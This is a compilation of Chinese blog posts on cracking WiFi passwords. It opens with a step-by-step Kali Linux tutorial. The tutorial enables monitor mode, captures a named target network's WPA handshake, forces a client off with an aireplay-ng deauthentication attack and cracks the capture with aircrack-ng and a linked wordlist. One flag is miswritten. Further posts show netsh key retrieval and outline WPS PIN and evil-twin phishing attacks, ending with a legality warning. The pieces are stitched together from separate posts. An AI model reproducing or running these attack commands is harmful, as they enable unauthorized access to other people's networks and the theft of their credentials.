言
最近整理了一些奇安信&華為&深信服大佬的課件資料+大廠面試課題,想要的可以私信自取,無(wú)償贈(zèng)送給粉絲朋友~
Aircrack-ng是一個(gè)與802.11標(biāo)準(zhǔn)的無(wú)線網(wǎng)絡(luò)分析有關(guān)的安全軟件,主要功能有:網(wǎng)絡(luò)偵測(cè),數(shù)據(jù)包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監(jiān)聽模式的無(wú)線網(wǎng)卡上(設(shè)備列表請(qǐng)參閱其官方網(wǎng)站)并嗅探802.11a,802.11b,802.11g的數(shù)據(jù)。該程序可運(yùn)行在Linux和Windows上。Linux版本已經(jīng)被移植到了Zaurus和Maemo系統(tǒng)平臺(tái), 并概念驗(yàn)證可移植到iPhone。
使用Kali 2021.3進(jìn)行演示操作
軟件:aircrack-ng(Kali系統(tǒng)內(nèi)置)
外置無(wú)線網(wǎng)卡設(shè)備: 要支持監(jiān)聽,支持Linux并且免驅(qū)(我這里使用的是RT3070)
命令: sudo su
解釋: 不在管理員模式下運(yùn)行可能會(huì)有權(quán)限不夠的提示
提示:執(zhí)行命令之后輸入Kali的密碼,密碼是被隱藏的,直接輸入然后回車即可
命令: iwconfig/ifconfig
解釋: iwconfig查看網(wǎng)卡的信息、ifconfig查看新連接的設(shè)備
wlan0就是我們的無(wú)線網(wǎng)卡
命令: airmon-ng check kill
解釋: 殺死進(jìn)程可以讓搜索更準(zhǔn)確,不會(huì)受到影響
命令: airmon-ng
出現(xiàn)你的網(wǎng)卡信息就說(shuō)明你的網(wǎng)卡支持監(jiān)聽
命令: airmon-ng start wlan0
解釋: start開啟哪個(gè)接口 wlan0是接口的名字
再用iwconfig查看一下網(wǎng)卡信息,wlan0后面多了個(gè)mon,wlan0mon就說(shuō)明已經(jīng)開啟監(jiān)聽了
命令: airodump-ng wlan0mon
解釋: BSSID:WIFI的MAC地址、PWR:信號(hào)強(qiáng)度(值越小信號(hào)強(qiáng)度強(qiáng))、Data:監(jiān)聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱
提示:找到網(wǎng)絡(luò)之后CTRL+Z結(jié)束搜索就可以
命令: airodump-ng -c (頻道號(hào)) --bssid (MAC地址) -w (抓取的數(shù)據(jù)包的保存位置) wlan0mon
解釋:
1.c:信道
2.bssid:BSSID值
3.w:捕獲的握手包要保存到的路徑
我要破解的目標(biāo)網(wǎng)絡(luò)是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創(chuàng)建了一個(gè)名為1的文件夾
輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的數(shù)值都要寫剛剛查到要破解的WIFI其中一個(gè)客戶端的值
當(dāng)新的客戶端連接時(shí),客戶端輸入密碼連接就可以抓到握手包,右上角出現(xiàn)WPA時(shí)就表示已經(jīng)抓到了對(duì)方的握手包
命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解釋:
0 :對(duì)客戶端表示發(fā)起攻擊,讓設(shè)備斷開連接
2:表示攻擊次數(shù),0表示一直攻擊
a :指定無(wú)線路由器BSSID
c :指定強(qiáng)制斷開的設(shè)備MAC
執(zhí)行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包時(shí)就停止攻擊
注意:執(zhí)行主動(dòng)攻擊的時(shí)候新建一個(gè)終端執(zhí)行命令,原來(lái)的抓包終端不要結(jié)束
命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解釋:
a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap是抓取到握手包的數(shù)據(jù)包文件
最后就是等待跑字典了,下面就是破解的WIFI密碼,密碼是20041101
命令: airmon-ng stop wlan0mon
在監(jiān)聽模式下,kali不能連接網(wǎng)絡(luò)
插入網(wǎng)卡,如果查看不到網(wǎng)卡信息,可以點(diǎn)開連接WIFI看一下能否搜索到附近的網(wǎng)絡(luò),如果不行那就右鍵系統(tǒng)可移動(dòng)設(shè)備-把網(wǎng)卡斷開再重新連接一下
插入網(wǎng)卡,打開網(wǎng)卡的監(jiān)聽模式,搜索附近的WIFI,獲取握手包,最后跑字典破解握手包,這里給大家提供一個(gè)常用的密碼字典
鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
提取碼: gg7y
版權(quán)聲明:本文為CSDN博主「HonkerG」的原創(chuàng)文章
原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123344248
家好,這期教大家如何破解無(wú)線WIFI密碼,無(wú)線WIFI密碼是非常重要的難免會(huì)在使用過(guò)程中時(shí)間久了忘記了WIFI密碼是什么,這就導(dǎo)致我們非常的著急。
下面我一步步教會(huì)大家如何破解WIFI密碼。
1.打開電腦進(jìn)入到系統(tǒng),然后按下快捷鍵(WIN+R)組合鍵,打開運(yùn)行窗口,輸入CMD命令,如下圖所示:
2.按確定按鈕或者直接回車鍵,跳出cmd命令窗口,如下圖所示:
3.在命令行中輸入netsh,進(jìn)入到網(wǎng)絡(luò)命令窗口,然后輸入wlan show profiles,如下圖所示:
4.如上圖,在用戶配置文件里面,我們可以看到目前我們所連接過(guò)的所有無(wú)線網(wǎng)的名稱,這些無(wú)線網(wǎng)的密碼我們都可以找到。具體應(yīng)該怎么操作呢?
5.接下來(lái),我們只需要在netsh>這一欄,輸入wlan show profile wifi名稱 key=clear 回車(這里的wifi名稱為 Tenda_1F) 這樣就可以在“關(guān)鍵內(nèi)容”后看到wifi密碼了,如下圖所示:
6.紅框中線上的安全密鑰即為這個(gè)WIFI的密碼123456789。同理,其他WIFI密碼同樣是如此輸入命令即可完成。
往期精彩回顧↓↓↓
電腦還不會(huì)重裝系統(tǒng)?3種簡(jiǎn)單方法總有一種適合你
電腦啟動(dòng)慢?玩游戲卡?4步優(yōu)化技巧,讓你的電腦性能發(fā)揮到極致
路由器為什么越用越卡?一招教你破解
首先,介紹一下,我是一名電子信息專業(yè)的學(xué)生,不是專業(yè)安全人員。對(duì)于這些方法的總結(jié),來(lái)源于我自己曾經(jīng)的黑客夢(mèng)的折騰,給大家分享我的經(jīng)驗(yàn)。
以前總喜歡學(xué)習(xí)黑客技術(shù),和朋友出去玩,總有人問(wèn)我能不能附近的WiFi密碼給破解了?對(duì)于這種情況,我表示挺無(wú)奈的,一般說(shuō)這個(gè)挺難破解的。于是,朋友默默的打開了某萬(wàn)能鑰匙,連上了WiFi,順帶說(shuō)一句,你整天瞎搗鼓啥呀,連個(gè)WiFi密碼都不會(huì)破解,還不如我這個(gè)萬(wàn)能鑰匙好使。萬(wàn)能鑰匙嚴(yán)格來(lái)說(shuō),不算破解WiFi密碼軟件,只是通過(guò)別人使用軟件輸入的密碼分享給你罷了,理論上,只要用的人足夠多,就能得到足夠多的WiFi密碼分享出來(lái)。今天,給一些不太了解的人,仔細(xì)的講解一下吧。
首先,給大家曬出我的第一臺(tái)WiFi攻擊設(shè)備,是一個(gè)亮科的LK-110 8187L版本的WiFi網(wǎng)卡,同樣其他品牌的8187L或者3070芯片的網(wǎng)卡都可以,這類無(wú)線網(wǎng)卡用于破解比較好,不推薦日常使用。
LK-110 8187版本無(wú)線網(wǎng)卡
破解的系統(tǒng)一般是kali linux或者cdlinux,kali linux系統(tǒng)的前身是backtrack系統(tǒng),對(duì)于攻擊滲透比較友好的系統(tǒng),但是操作復(fù)雜;而cdlinux只是用于WiFi密碼破解,系統(tǒng)鏡像小,操作簡(jiǎn)便。
kali linux無(wú)線攻擊工具集
cdlinux系統(tǒng)界面截圖
窮舉法就是咱們常說(shuō)的暴力破解法,只要我這邊擁有的密碼足夠豐富,依靠電腦的多線程嘗試連接,只要我都密碼集里面有你的密碼,破解出來(lái)只是時(shí)間問(wèn)題。所以從這方面來(lái)看,你的WiFi密碼越復(fù)雜,長(zhǎng)度越長(zhǎng),破解的難度就越大。同時(shí),這種破解方法很容易造成WiFi的崩潰,一般都不用這種方法。
因?yàn)樯厦娴姆椒ê茈y破解,所以黑客們開始找路由器芯片的漏洞來(lái)破解。這種方法只適用于支持WPS的路由器,有些廠商會(huì)在路由器上留下一個(gè)WPS按鈕,按一下就可以不用輸入密碼連接WiFi。一般這類路由器pin碼是8位純數(shù)字,而且還可以分段破解,就是可以先跑前面四位,驗(yàn)證前面的正確性,然后繼續(xù)破解,這樣就能很快的破解。但是路由器廠商,也推出了相應(yīng)的對(duì)策,只要嘗試的次數(shù)多,就不會(huì)繼續(xù)讓你嘗試了,這種方法用的也少。
這種方法用的比較多,原理就是偽造一個(gè)和被攻擊WiFi相同名字的WiFi,然后通過(guò)攻擊,讓在被攻擊WiFi的用戶掉線,讓該WiFi的用戶連接到偽造的WiFi,然后給出一個(gè)重新輸入WiFi密碼的頁(yè)面,讓用戶手動(dòng)輸入自己的WiFi密碼,從而得到密碼的過(guò)程。所以,當(dāng)你的WiFi界面出現(xiàn)要你重新輸入密碼的時(shí)候,那么你就得注意了,出去看一下你連接的WiFi是否準(zhǔn)確,一般偽造的WiFi通常讓你手機(jī)自動(dòng)連接,不會(huì)設(shè)置密碼,所以可以從你連接的WiFi有無(wú)加密這方面判斷。
一般這種方法也用的比較多,原理是通過(guò)打斷用戶與路由器連接,獲取用戶與路由器之間的握手包。通過(guò)解密握手包,從而獲得密碼。而且只要把握手包拷貝出來(lái),在任意一臺(tái)電腦上,都可以進(jìn)行離線破解,同時(shí)還支持GPU加速破解。所以在某些黑產(chǎn)挖礦網(wǎng)站上有接這種訂單的,上傳握手包到網(wǎng)站,利用眾多的顯卡破解,速度還是相當(dāng)可觀的。
我所查到的網(wǎng)上各種破解WiFi密碼教程基本上就是以上四種了,如果有安全圈子的大佬,還有其他方法,歡迎在評(píng)論區(qū)給大家講解。順便提一下,現(xiàn)在破解WiFi是一種違法行為,希望大家不要攻擊他人WiFi,想學(xué)習(xí)的,請(qǐng)大家自己搭建熱點(diǎn)測(cè)試。